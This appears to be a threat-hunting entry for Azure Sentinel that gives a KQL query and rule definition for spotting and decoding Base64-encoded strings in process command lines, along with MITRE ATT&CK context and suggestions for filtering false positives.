Base64 Detector and Decoder

Hunt Hypothesis

Adversaries may use Base64 encoding to obfuscate malicious command-line arguments in processes, making it harder to detect malicious activity through simple string matching. SOC teams should proactively hunt for Base64-encoded strings in process command lines to identify potential obfuscated payloads and early-stage compromise in their Azure Sentinel environment.

KQL Query

DeviceProcessEvents 
| extend SplitLaunchString = split(ProcessCommandLine, " ")
| mvexpand SplitLaunchString
| where SplitLaunchString matches regex "^[A-Za-z0-9+/]{50,}[=]{0,2}$"
| extend Base64 = tostring(SplitLaunchString)
| extend DecodedString = base64_decodestring(Base64)
| where isnotempty(DecodedString)

Analytic Rule Definition

id: 89fc1421-8387-4c2b-9bcb-75ead57ccb2c
name: Base64 Detector and Decoder
description: |
  This query will identify strings in process command lines which match Base64 encoding format, extract the string to a column called Base64, and decode it in a column called DecodedString.
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
  dataTypes:
  - DeviceProcessEvents
tactics:
- Execution
query: |
  DeviceProcessEvents 
  | extend SplitLaunchString = split(ProcessCommandLine, " ")
  | mvexpand SplitLaunchString
  | where SplitLaunchString matches regex "^[A-Za-z0-9+/]{50,}[=]{0,2}$"
  | extend Base64 = tostring(SplitLaunchString)
  | extend DecodedString = base64_decodestring(Base64)
  | where isnotempty(DecodedString)

Required Data Sources

Sentinel Table	Notes
`DeviceProcessEvents`	Ensure this data connector is enabled

MITRE ATT&CK Context

Tactic: Execution

References

[Source Query](https://github.com/Azure/Azure-Sentinel/blob/main/Hunting Queries/Microsoft 365 Defender/Execution/Base64 Detector and Decoder.yaml)

False Positive Guidance

Scenario: A system administrator is using base64 to encode a password for a configuration file in a scheduled job.
Filter/Exclusion: Exclude processes associated with known administrative tasks, e.g., crontab, at, or systemd-timedated, or filter by command lines containing --encode or --decode flags.
Scenario: A developer is using base64 to encode binary data (e.g., an image or certificate) for a CI/CD pipeline task.
Filter/Exclusion: Exclude processes related to CI/CD tools like Jenkins, GitLab CI, or GitHub Actions, or filter by command lines containing --binary or --encode flags.
Scenario: A security tool like Wireshark or tcpdump is exporting packet data in Base64 format for analysis.
Filter/Exclusion: Exclude processes related to network analysis tools or filter by command lines containing --output or --base64 flags.
Scenario: A database administrator is using base64 to encode binary data (e.g., a dump file) for backup purposes.
Filter/Exclusion: Exclude processes related to backup tools like mysqldump, pg_dump, or sqlcmd, or filter by command lines containing --binary or --base64 flags.
Scenario: A system update or patching tool (e.g., yum, apt, or Chocolatey) is using Base64 encoding to transfer binary payloads.
Filter/Exclusion: Exclude processes related to package managers or filter by command lines containing --download, --install, or --patch flags.